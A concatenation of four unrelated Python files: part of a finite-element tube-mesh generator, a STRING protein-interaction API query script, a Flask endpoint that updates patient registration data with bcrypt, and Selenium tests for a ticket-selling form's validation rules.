d2FlatList = d2FlatList + d2FlatList[-(elementsCountAround+1)*(elementsCountThroughWall+1):]
return xFlatList, d1FlatList, d2FlatList
def createOrganCoordinates(xiList, relativeThicknessList, lengthToDiameterRatio, wallThicknessToDiameterRatio,
elementsCountAround, elementsCountAlong, elementsCountThroughWall, transitElementList):
"""
Calculates organ coordinates and derivatives represented by a cylindrical tube with a unit inner diameter,
length equivalent to lengthToDiameterRatio and wall thickness of wallThicknessToDiameterRatio.
:param xiList: List containing xi for each point around the outer surface of the tube.
:param relativeThicknessList: Relative thickness of each element through wall for organ coordinates.
:param lengthToDiameterRatio: Ratio of total length along organ to inner diameter of organ
:param wallThicknessToDiameterRatio: Ratio of wall thickness to inner diameter of organ.
:param elementsCountAround: Number of elements around tube.
:param elementsCountAlong: Number of elements along tube.
:param elementsCountThroughWall: Number of elements through wall.
:param transitElementList: stores true if element around is a transition element between a big and small element.
:return: coordinates and derivatives of organ coordinates field.
"""
if relativeThicknessList:
xi3 = 0.0
xi3List = [0.0]
for n3 in range(elementsCountThroughWall):
xi3 += relativeThicknessList[n3]
xi3List.append(xi3)
relativeThicknessList.append(relativeThicknessList[-1])
# Calculate organ coordinates and derivatives
xOrganList = []
d1OrganList = []
d2OrganList = []
d2 = [0.0, lengthToDiameterRatio / elementsCountAlong, 0.0]
for n2 in range(elementsCountAlong + 1):
cx = [0.0, lengthToDiameterRatio / elementsCountAlong * n2, 0.0]
xiFace = xiList[n2]
for n3 in range(elementsCountThroughWall + 1):
xi3 = xi3List[n3] if relativeThicknessList else 1.0/elementsCountThroughWall * n3
radius = 0.5 + wallThicknessToDiameterRatio * xi3
axis1 = [0.0, 0.0, radius]
axis2 = [radius, 0.0, 0.0]
d1List = []
for n1 in range(len(xiFace) - 1):
dTheta = (xiFace[n1 + 1 if n1 < len(xiFace) - 1 else 0] - xiFace[n1]) * 2.0 * math.pi
radiansAround = 2.0 * math.pi * xiFace[n1]
cosRadiansAround = math.cos(radiansAround)
sinRadiansAround = math.sin(radiansAround)
xOrganList.append([(cx[c] + cosRadiansAround * axis1[c] + sinRadiansAround * axis2[c]) for c in range(3)])
d1List.append([ dTheta*(-sinRadiansAround*axis1[c] + cosRadiansAround*axis2[c]) for c in range(3) ])
d2OrganList.append(d2)
# To modify derivative along transition elements
for i in range(len(transitElementList)):
if transitElementList[i]:
d1List[i] = vector.setMagnitude(d1List[i], vector.magnitude(d1List[i - 1]))
d1List[i + 1] = vector.setMagnitude(d1List[i+ 1], vector.magnitude(d1List[(i + 2) % elementsCountAround]))
d1OrganList += d1List
return xOrganList, d1OrganList, d2OrganList
def createNodesAndElements(region,
x, d1, d2, d3,
xFlat, d1Flat, d2Flat,
xOrgan, d1Organ, d2Organ, organCoordinateFieldName,
elementsCountAround, elementsCountAlong, elementsCountThroughWall,
annotationGroupsAround, annotationGroupsAlong, annotationGroupsThroughWall,
firstNodeIdentifier, firstElementIdentifier,
useCubicHermiteThroughWall, useCrossDerivatives, closedProximalEnd):
"""
Create nodes and elements for the coordinates and flat coordinates fields.
:param x, d1, d2, d3: coordinates and derivatives of coordinates field.
:param xFlat, d1Flat, d2Flat, d3Flat: coordinates and derivatives of
flat coordinates field.
:param xOrgan, d1Organ, d2Organ, d3Organ, organCoordinateFieldName: coordinates, derivatives and name of organ
coordinates field.
:param elementsCountAround: Number of elements around tube.
:param elementsCountAlong: Number of elements along tube.
:param elementsCountThroughWall: Number of elements through wall.
:param annotationGroupsAround: Annotation groups of elements around.
:param annotationGroupsAlong: Annotation groups of elements along.
:param annotationGroupsThroughWall: Annotation groups of elements through wall.
:param firstNodeIdentifier, firstElementIdentifier: first node and
element identifier to use.
:param useCubicHermiteThroughWall: use linear when false
:param useCrossDerivatives: use cross derivatives when true
:return nodeIdentifier, elementIdentifier, allAnnotationGroups
"""
nodeIdentifier = firstNodeIdentifier
elementIdentifier = firstElementIdentifier
zero = [ 0.0, 0.0, 0.0 ]
fm = region.getFieldmodule()
fm.beginChange()
cache = fm.createFieldcache()
# Coordinates field
coordinates = findOrCreateFieldCoordinates(fm)
nodes = fm.findNodesetByFieldDomainType(Field.DOMAIN_TYPE_NODES)
nodetemplate = nodes.createNodetemplate()
nodetemplate.defineField(coordinates)
nodetemplate.setValueNumberOfVersions(coordinates, -1, Node.VALUE_LABEL_VALUE, 1)
nodetemplate.setValueNumberOfVersions(coordinates, -1, Node.VALUE_LABEL_D_DS1, 1)
nodetemplate.setValueNumberOfVersions(coordinates, -1, Node.VALUE_LABEL_D_DS2, 1)
if useCrossDerivatives:
nodetemplate.setValueNumberOfVersions(coordinates, -1, Node.VALUE_LABEL_D2_DS1DS2, 1)
if useCubicHermiteThroughWall:
nodetemplate.setValueNumberOfVersions(coordinates, -1, Node.VALUE_LABEL_D_DS3, 1)
if useCrossDerivatives:
nodetemplate.setValueNumberOfVersions(coordinates, -1, Node.VALUE_LABEL_D2_DS1DS3, 1)
nodetemplate.setValueNumberOfVersions(coordinates, -1, Node.VALUE_LABEL_D2_DS2DS3, 1)
nodetemplate.setValueNumberOfVersions(coordinates, -1, Node.VALUE_LABEL_D3_DS1DS2DS3, 1)
mesh = fm.findMeshByDimension(3)
if useCubicHermiteThroughWall:
eftfactory = eftfactory_tricubichermite(mesh, useCrossDerivatives)
else:
eftfactory = eftfactory_bicubichermitelinear(mesh, useCrossDerivatives)
eft = eftfactory.createEftBasic()
elementtemplate = mesh.createElementtemplate()
elementtemplate.setElementShapeType(Element.SHAPE_TYPE_CUBE)
result = elementtemplate.defineField(coordinates, -1, eft)
if xFlat:
# Flat coordinates field
bicubichermitelinear = eftfactory_bicubichermitelinear(mesh, useCrossDerivatives)
eftFlat1 = bicubichermitelinear.createEftBasic()
eftFlat2 = bicubichermitelinear.createEftOpenTube()
flatCoordinates = findOrCreateFieldCoordinates(fm, name="flat coordinates")
flatNodetemplate1 = nodes.createNodetemplate()
flatNodetemplate1.defineField(flatCoordinates)
flatNodetemplate1.setValueNumberOfVersions(flatCoordinates, -1, Node.VALUE_LABEL_VALUE, 1)
flatNodetemplate1.setValueNumberOfVersions(flatCoordinates, -1, Node.VALUE_LABEL_D_DS1, 1)
flatNodetemplate1.setValueNumberOfVersions(flatCoordinates, -1, Node.VALUE_LABEL_D_DS2, 1)
if useCrossDerivatives:
flatNodetemplate1.setValueNumberOfVersions(flatCoordinates, -1, Node.VALUE_LABEL_D2_DS1DS2, 1)
flatNodetemplate2 = nodes.createNodetemplate()
flatNodetemplate2.defineField(flatCoordinates)
flatNodetemplate2.setValueNumberOfVersions(flatCoordinates, -1, Node.VALUE_LABEL_VALUE, 2)
flatNodetemplate2.setValueNumberOfVersions(flatCoordinates, -1, Node.VALUE_LABEL_D_DS1, 2)
flatNodetemplate2.setValueNumberOfVersions(flatCoordinates, -1, Node.VALUE_LABEL_D_DS2, 2)
if useCrossDerivatives:
flatNodetemplate2.setValueNumberOfVersions(flatCoordinates, -1, Node.VALUE_LABEL_D2_DS1DS2, 2)
flatElementtemplate1 = mesh.createElementtemplate()
flatElementtemplate1.setElementShapeType(Element.SHAPE_TYPE_CUBE)
flatElementtemplate1.defineField(flatCoordinates, -1, eftFlat1)
flatElementtemplate2 = mesh.createElementtemplate()
flatElementtemplate2.setElementShapeType(Element.SHAPE_TYPE_CUBE)
flatElementtemplate2.defineField(flatCoordinates, -1, eftFlat2)
if xOrgan:
# Organ coordinates field
bicubichermitelinear = eftfactory_bicubichermitelinear(mesh, useCrossDerivatives)
eftOrgan = bicubichermitelinear.createEftBasic()
organCoordinates = findOrCreateFieldCoordinates(fm, name=organCoordinateFieldName)
organNodetemplate = nodes.createNodetemplate()
organNodetemplate.defineField(organCoordinates)
organNodetemplate.setValueNumberOfVersions(organCoordinates, -1, Node.VALUE_LABEL_VALUE, 1)
organNodetemplate.setValueNumberOfVersions(organCoordinates, -1, Node.VALUE_LABEL_D_DS1, 1)
organNodetemplate.setValueNumberOfVersions(organCoordinates, -1, Node.VALUE_LABEL_D_DS2, 1)
if useCrossDerivatives:
organNodetemplate.setValueNumberOfVersions(organCoordinates, -1, Node.VALUE_LABEL_D2_DS1DS2, 1)
organElementtemplate = mesh.createElementtemplate()
organElementtemplate.setElementShapeType(Element.SHAPE_TYPE_CUBE)
organElementtemplate.defineField(organCoordinates, -1, eftOrgan)
# Create nodes
# Coordinates field
for n in range(len(x)):
node = nodes.createNode(nodeIdentifier, nodetemplate)
cache.setNode(node)
coordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_VALUE, 1, x[n])
coordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D_DS1, 1, d1[n])
coordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D_DS2, 1, d2[n])
coordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D_DS3, 1, d3[n])
if useCrossDerivatives:
coordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D2_DS1DS2, 1, zero)
coordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D2_DS1DS3, 1, zero)
coordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D2_DS2DS3, 1, zero)
coordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D3_DS1DS2DS3, 1, zero)
# print('NodeIdentifier = ', nodeIdentifier, x[n], d1[n], d2[n])
nodeIdentifier = nodeIdentifier + 1
# Flat coordinates field
if xFlat:
nodeIdentifier = firstNodeIdentifier
for n2 in range(elementsCountAlong + 1):
for n3 in range(elementsCountThroughWall + 1):
for n1 in range(elementsCountAround):
i = n2*(elementsCountAround + 1)*(elementsCountThroughWall + 1) + (elementsCountAround + 1)*n3 + n1
node = nodes.findNodeByIdentifier(nodeIdentifier)
node.merge(flatNodetemplate2 if n1 == 0 else flatNodetemplate1)
cache.setNode(node)
# print('NodeIdentifier', nodeIdentifier, 'version 1, xList Index =', i+1)
flatCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_VALUE, 1, xFlat[i])
flatCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D_DS1, 1, d1Flat[i])
flatCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D_DS2, 1, d2Flat[i])
if useCrossDerivatives:
flatCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D2_DS1DS2, 1, zero)
if n1 == 0:
# print('NodeIdentifier', nodeIdentifier, 'version 2, xList Index =', i+elementsCountAround+1)
flatCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_VALUE, 2, xFlat[i+elementsCountAround])
flatCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D_DS1, 2, d1Flat[i+elementsCountAround])
flatCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D_DS2, 2, d2Flat[i+elementsCountAround])
if useCrossDerivatives:
flatCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D2_DS1DS2, 2, zero)
nodeIdentifier = nodeIdentifier + 1
# Organ coordinates field
if xOrgan:
nodeIdentifier = firstNodeIdentifier
for n in range(len(xOrgan)):
node = nodes.findNodeByIdentifier(nodeIdentifier)
node.merge(organNodetemplate)
cache.setNode(node)
organCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_VALUE, 1, xOrgan[n])
organCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D_DS1, 1, d1Organ[n])
organCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D_DS2, 1, d2Organ[n])
if useCrossDerivatives:
organCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D2_DS1DS2, 1, zero)
nodeIdentifier = nodeIdentifier + 1
# create elements
elementtemplate3 = mesh.createElementtemplate()
elementtemplate3.setElementShapeType(Element.SHAPE_TYPE_CUBE)
radiansPerElementAround = math.pi*2.0 / elementsCountAround
allAnnotationGroups = []
if closedProximalEnd:
# Create apex
for e3 in range(elementsCountThroughWall):
for e1 in range(elementsCountAround):
va = e1
vb = (e1 + 1) % elementsCountAround
eft1 = eftfactory.createEftShellPoleBottom(va * 100, vb * 100)
elementtemplate3.defineField(coordinates, -1, eft1)
element = mesh.createElement(elementIdentifier, elementtemplate3)
bni1 = e3 + 1
bni2 = elementsCountThroughWall + 1 + elementsCountAround*e3 + e1 + 1
bni3 = elementsCountThroughWall + 1 + elementsCountAround*e3 + (e1 + 1) % elementsCountAround + 1
nodeIdentifiers = [bni1, bni2, bni3, bni1 + 1, bni2 + elementsCountAround, bni3 + elementsCountAround]
element.setNodesByIdentifier(eft1, nodeIdentifiers)
# set general linear map coefficients
radiansAround = e1 * radiansPerElementAround
radiansAroundNext = ((e1 + 1) % elementsCountAround) * radiansPerElementAround
scalefactors = [
-1.0,
math.sin(radiansAround), math.cos(radiansAround), radiansPerElementAround,
math.sin(radiansAroundNext), math.cos(radiansAroundNext), radiansPerElementAround,
math.sin(radiansAround), math.cos(radiansAround), radiansPerElementAround,
math.sin(radiansAroundNext), math.cos(radiansAroundNext), radiansPerElementAround
]
result = element.setScaleFactors(eft1, scalefactors)
elementIdentifier = elementIdentifier + 1
annotationGroups = annotationGroupsAround[e1] + annotationGroupsAlong[0] + \
annotationGroupsThroughWall[e3]
if annotationGroups:
allAnnotationGroups = mergeAnnotationGroups(allAnnotationGroups, annotationGroups)
for annotationGroup in annotationGroups:
meshGroup = annotationGroup.getMeshGroup(mesh)
meshGroup.addElement(element)
# Create regular elements
now = elementsCountAround * (elementsCountThroughWall + 1)
for e2 in range(1 if closedProximalEnd else 0, elementsCountAlong):
for e3 in range(elementsCountThroughWall):
for e1 in range(elementsCountAround):
if closedProximalEnd:
bni11 = (e2-1) * now + e3 * elementsCountAround + e1 + 1 + (elementsCountThroughWall + 1)
bni12 = (e2-1) * now + e3 * elementsCountAround + (e1 + 1) % elementsCountAround + 1 + \
(elementsCountThroughWall + 1)
bni21 = (e2-1) * now + (e3 + 1) * elementsCountAround + e1 + 1 + (elementsCountThroughWall + 1)
bni22 = (e2-1) * now + (e3 + 1) * elementsCountAround + (e1 + 1) % elementsCountAround + 1 + \
(elementsCountThroughWall + 1)
else:
bni11 = e2 * now + e3 * elementsCountAround + e1 + 1
bni12 = e2 * now + e3 * elementsCountAround + (e1 + 1) % elementsCountAround + 1
bni21 = e2 * now + (e3 + 1) * elementsCountAround + e1 + 1
bni22 = e2 * now + (e3 + 1) * elementsCountAround + (e1 + 1) % elementsCountAround + 1
nodeIdentifiers = [bni11, bni12, bni11 + now, bni12 + now, bni21, bni22, bni21 + now, bni22 + now]
onOpening = e1 > elementsCountAround - 2
element = mesh.createElement(elementIdentifier, elementtemplate)
element.setNodesByIdentifier(eft, nodeIdentifiers)
if xFlat:
element.merge(flatElementtemplate2 if onOpening else flatElementtemplate1)
element.setNodesByIdentifier(eftFlat2 if onOpening else eftFlat1, nodeIdentifiers)
if xOrgan:
element.merge(organElementtemplate)
element.setNodesByIdentifier(eftOrgan, nodeIdentifiers)
elementIdentifier = elementIdentifier + 1
annotationGroups = annotationGroupsAround[e1] + annotationGroupsAlong[e2] + \
annotationGroupsThroughWall[e3]
if annotationGroups:
allAnnotationGroups = mergeAnnotationGroups(allAnnotationGroups, annotationGroups)
for annotationGroup in annotationGroups:
meshGroup = annotationGroup.getMeshGroup(mesh)
meshGroup.addElement(element)
fm.endChange()
return nodeIdentifier, elementIdentifier, allAnnotationGroups
class CylindricalSegmentTubeMeshInnerPoints:
"""
Generates inner profile of a cylindrical segment for use by tubemesh.
"""
def __init__(self, elementsCountAround, elementsCountAlongSegment,
segmentLength, wallThickness, innerRadiusSegmentList, dInnerRadiusSegmentList, startPhase):
self._elementsCountAround = elementsCountAround
self._elementsCountAlongSegment = elementsCountAlongSegment
self._segmentLength = segmentLength
self._wallThickness = wallThickness
self._innerRadiusSegmentList = innerRadiusSegmentList
self._dInnerRadiusSegmentList = dInnerRadiusSegmentList
self._xiList = []
self._flatWidthList = []
self._startPhase = startPhase
def getCylindricalSegmentTubeMeshInnerPoints(self, nSegment):
# Unpack radius and rate of change of inner radius
startRadius = self._innerRadiusSegmentList[nSegment]
startRadiusDerivative = self._dInnerRadiusSegmentList[nSegment]
endRadius = self._innerRadiusSegmentList[nSegment+1]
endRadiusDerivative = self._dInnerRadiusSegmentList[nSegment+1]
xInner, d1Inner, d2Inner, transitElementList, xiSegment, flatWidthSegment, segmentAxis, radiusAlongSegmentList \
= getCylindricalSegmentInnerPoints(self._elementsCountAround, self._elementsCountAlongSegment,
self._segmentLength, self._wallThickness, startRadius,
startRadiusDerivative, endRadius, endRadiusDerivative,
self._startPhase)
startIdx = 0 if nSegment == 0 else 1
xi = xiSegment[startIdx:self._elementsCountAlongSegment + 1]
self._xiList += xi
flatWidth = flatWidthSegment[startIdx:self._elementsCountAlongSegment + 1]
self._flatWidthList += flatWidth
return xInner, d1Inner, d2Inner, transitElementList, segmentAxis, radiusAlongSegmentList
def getFlatWidthAndXiList(self):
return self._flatWidthList, self._xiList
def getCylindricalSegmentInnerPoints(elementsCountAround, elementsCountAlongSegment, segmentLength,
wallThickness, startRadius, startRadiusDerivative, endRadius, endRadiusDerivative,
startPhase):
"""
Generates a 3-D cylindrical segment mesh with variable numbers of elements
around, along the central path, and through wall.
:param elementsCountAround: Number of elements around.
:param elementsCountAlongSegment: Number of elements along cylindrical segment.
:param segmentLength: Length of a cylindrical segment.
:param wallThickness: Thickness of wall.
:param startRadius: Inner radius at proximal end.
:param startRadiusDerivative: Rate of change of inner radius at proximal end.
:param endRadius: Inner radius at distal end.
:param endRadiusDerivative: Rate of change of inner radius at distal end.
:param startPhase: Phase at start.
:return coordinates, derivatives on inner surface of a cylindrical segment.
:return transitElementList: stores true if element around is an element that
transits between a big and small element.
:return xiList: List of xi for each node around. xi refers to node position
along the width when cylindrical segment is opened into a flat preparation,
nominally in [0.0, 1.0].
:return flatWidthList: List of width around elements for each element
along cylindrical segment when the segment is opened into a flat preparation.
:return segmentAxis: Axis of segment.
:return sRadiusAlongSegment: radius of each element along segment.
"""
transitElementList = [0] * elementsCountAround
# create nodes
segmentAxis = [0.0, 0.0, 1.0]
xFinal = []
d1Final = []
d2Final = []
xiList = []
flatWidthList = []
sRadiusAlongSegment = []
for n2 in range(elementsCountAlongSegment + 1):
phase = startPhase + n2 * 360.0 / elementsCountAlongSegment
xi = (phase if phase <= 360.0 else phase - 360.0) / 360.0
radius = interp.interpolateCubicHermite([startRadius], [startRadiusDerivative],
[endRadius], [endRadiusDerivative], xi)[0]
sRadiusAlongSegment.append(radius)
z = segmentLength / elementsCountAlongSegment * n2 + startPhase / 360.0 * segmentLength
xLoop, d1Loop = createCirclePoints([0.0, 0.0, z], [radius, 0.0, 0.0], [0.0, radius, 0.0],
elementsCountAround, startRadians=0.0)
xFinal = xFinal + xLoop
d1Final = d1Final + d1Loop
# Smooth d2 for segment
smoothd2Raw = []
for n1 in range(elementsCountAround):
nx = []
nd2 = []
for n2 in range(elementsCountAlongSegment + 1):
n = n2 * elementsCountAround + n1
nx.append(xFinal[n])
nd2.append(segmentAxis)
smoothd2 = interp.smoothCubicHermiteDerivativesLine(nx, nd2)
smoothd2Raw.append(smoothd2)
# Re-arrange smoothd2
for n2 in range(elementsCountAlongSegment + 1):
radius = sRadiusAlongSegment[n2]
flatWidth = 2.0*math.pi*(radius + wallThickness)
flatWidthList.append(flatWidth)
xiFace = []
for n1 in range(elementsCountAround):
d2Final.append(smoothd2Raw[n1][n2])
for n1 in range(elementsCountAround + 1):
xi = 1.0/elementsCountAround * n1
xiFace.append(xi)
xiList.append(xiFace)
return xFinal, d1Final, d2Final, transitElementList, xiList, flatWidthList, segmentAxis, sRadiusAlongSegment
|
# %%
import requests
# %%
def get_string_net(genes, score=800):
"""Query STRINGdb interactions endpoint"""
string_api_url = "https://string-db.org/api"
output_format = "tsv-no-header"
method = "network"
request_url = "/".join([string_api_url, output_format, method])
params = {
"identifiers": "%0d".join(genes),
"species": 9606,
"caller_identity": "www.jvfe.github.io",
"required_score": score,
}
response = requests.post(request_url, data=params)
return response
# %%
with open("../data/dna_damage.txt", "r") as g:
genes = g.read().splitlines()
# %%
interactions = get_string_net(genes).text
with open("../results/interactions.tsv", "w") as res:
res.write(interactions)
|
from sharedData import *
changeRegister_api = Blueprint('changeRegister_api', __name__)
# users registers
@changeRegister_api.route('/changeregister', methods=['GET', 'POST'])
def changeRegister():
global usersDataOnline
print("////////////////////////////////////////")
print("comeca change register")
print("usersDataOnline.getDictionary() = "+ str(usersDataOnline.getDictionary()))
userData = usersDataOnline.getUser(session['user'])
print("usersDataOnline.getDictionary() = "+ str(usersDataOnline.getDictionary()))
print("volta para change register")
if userData == None:
print("usersDataOnline.getUser(session['user']) == None")
if 'user' in session:
if not usersDataOnline.userIsOn(session['user']):
print("user has cookie but not logged, redirect to login")
userData = usuario.acessoUser()
#cursor
cur = connectionData.getConnector().cursor()
cur.execute("SELECT * FROM paciente WHERE cpf = %s",(session['user'],))
user = cur.fetchall()
userData.logginUser(user[0])
usersDataOnline.addUserOn(userData)
else:
session.pop('user', None)
return redirect('/logged')
user_list = userData.getStringList()
print("userData.getStringList() = "+ str(user_list))
cpf = user_list[2]
if request.method == 'POST':
# Fetch form data
userDetails = request.form
submit = userDetails['submit']
if (submit == "Enviar" ):
psd = userDetails['psd']
name = userDetails['name']
birth_date = userDetails['birth_date']
sex = userDetails['sex']
adress = userDetails['adress']
phone = userDetails['phone']
email = userDetails['email']
military = userDetails['military']
#cursor
cur = connectionData.getConnector().cursor()
#print(cpf +" "+ psd +" "+ saram +" "+ name +" "+ birth_date +" "+ sex +" "+ adress +" "+ phone +" "+ email +" "+ military)
hashed = bcrypt.hashpw(psd.encode(),bcrypt.gensalt(12))
hashedDecoded = hashed.decode('utf-8')
cur.execute("SELECT senha FROM paciente WHERE cpf = %s",(cpf,))
psd_db = cur.fetchall()
psd_db = psd_db[0][0]
if (bcrypt.hashpw(psd.encode(),psd_db.encode()) != psd_db.encode() and len(psd) != 0):
cur.execute("UPDATE paciente SET senha=%s,nome=%s,dt_nasc=%s,sexo=%s,endereco=%s,telefone=%s,email=%s,militar=%s WHERE cpf=%s",(hashedDecoded,name,birth_date,sex,adress,phone,email,military,cpf))
else:
cur.execute("UPDATE paciente SET nome=%s,dt_nasc=%s,sexo=%s,endereco=%s,telefone=%s,email=%s,militar=%s WHERE cpf=%s",(name,birth_date,sex,adress,phone,email,military,cpf))
#commit the transcation
connectionData.getConnector().commit()
cur.execute("SELECT * FROM paciente WHERE cpf = %s",(cpf,))
#apaga no dictionary a usuario
cpf = session['user']
usersDataOnline.logoutUser(cpf)
userData = usuario.acessoUser()
user = cur.fetchall()
userData.logginUser(user[0])
usersDataOnline.addUserOn(userData)
print("ATUALIZAÇÃO DOS DADOS COM SUCESSO")
#close the cursor
cur.close()
return redirect('/logged')
return render_template('changeRegister.html',userDetails = user_list)
|
import pytest
from seleniumbase import BaseCase
from selenium.webdriver.common.keys import Keys
from qa327_test.conftest import base_url
from unittest.mock import patch
from qa327.models import db, User
from werkzeug.security import generate_password_hash, check_password_hash
"""
This file defines all unit tests for the frontend login page.
"""
# Moch a sample user
test_user = User(
email='[email protected]',
name='test_sell',
password=generate_password_hash('TEST_frontend')
)
class FrontEndSellTest(BaseCase):
# Login to the profile for the purpose of testing functionality of sell form.
def login_to_profile(self):
# invalid any existing session
self.open(base_url + '/logout')
self.open(base_url + '/login')
# enter test user email and password
self.type("#email", "[email protected]")
self.type("#password", "TEST_frontend")
# click enter button
self.click('input[type="submit"]')
# R4.1 The name of the ticket has to be alphanumeric-only, and space allowed only if it is not the first or the last character.
@patch('qa327.backend.get_user', return_value=test_user)
def test_name_format(self, *_):
# login to the profile
self.login_to_profile()
""" NEGATIVE """
# enter invalid name and valid quantity, price and date
self.type("#sell-name", " TESTticket")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT, "31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
# enter invalid name and valid quantity, price and date
self.type("#sell-name", "TESTticket ")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
# enter invalid name and valid quantity, price and date
self.type("#sell-name", "TE_STticket")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
""" POSITIVE """
# enter valid name, quantity, price and date
self.type("#sell-name", "TESTticket")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit succeed
self.assert_element("#message")
self.assert_text("Ticket successfully posted", "#message")
self.open(base_url)
# R4.2 The name of the ticket is no longer than 60 characters
# R4.8 (optional) The name of the tickets has to contain at least 6 characters
@patch('qa327.backend.get_user', return_value=test_user)
def test_name_length(self, *_):
# login to the profile
self.login_to_profile()
""" NEGATIVE """
# enter invalid name and valid quantity, price and date
self.type("#sell-name", 6*"TESTticket1")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
# enter invalid name and valid quantity, price and date
self.type("#sell-name", "TEST1")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
""" POSITIVE """
# enter valid name, quantity, price and date
self.type("#sell-name", "TESTticket1")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit succeed
self.assert_element("#message")
self.assert_text("Ticket successfully posted", "#message")
self.open(base_url)
# R4.3 The quantity of the tickets has to be more than 0, and less than or equal to 100.
@patch('qa327.backend.get_user', return_value=test_user)
def test_quantity(self, *_):
# login to the profile
self.login_to_profile()
""" NEGATIVE """
# enter invalid quantity and valid name, price and date
self.type("#sell-name", "TESTticket2")
self.type("#sell-quantity", "0")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
# enter invalid quantity and valid name, price and date
self.type("#sell-name", "TESTticket2")
self.type("#sell-quantity", "102")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
""" POSITIVE """
# enter valid name, quantity, price and date
self.type("#sell-name", "TESTticket2")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit succeed
self.assert_element("#message")
self.assert_text("Ticket successfully posted", "#message")
self.open(base_url)
# R4.4 Price has to be of range [10, 100]
@patch('qa327.backend.get_user', return_value=test_user)
def test_price(self, *_):
# login to the profile
self.login_to_profile()
""" NEGATIVE """
# enter invalid price and valid name, quantity and date
self.type("#sell-name", "TESTticket3")
self.type("#sell-quantity", "50")
self.type("#sell-price", "0")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
# enter invalid price and valid name, quantity and date
self.type("#sell-name", "TESTticket3")
self.type("#sell-quantity", "50")
self.type("#sell-price", "102")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
""" POSITIVE """
# enter valid name, quantity, price and date
self.type("#sell-name", "TESTticket3")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit succeed
self.assert_element("#message")
self.assert_text("Ticket successfully posted", "#message")
self.open(base_url)
# R4.5 Date must be given in the format YYYYMMDD (e.g. 20200901)
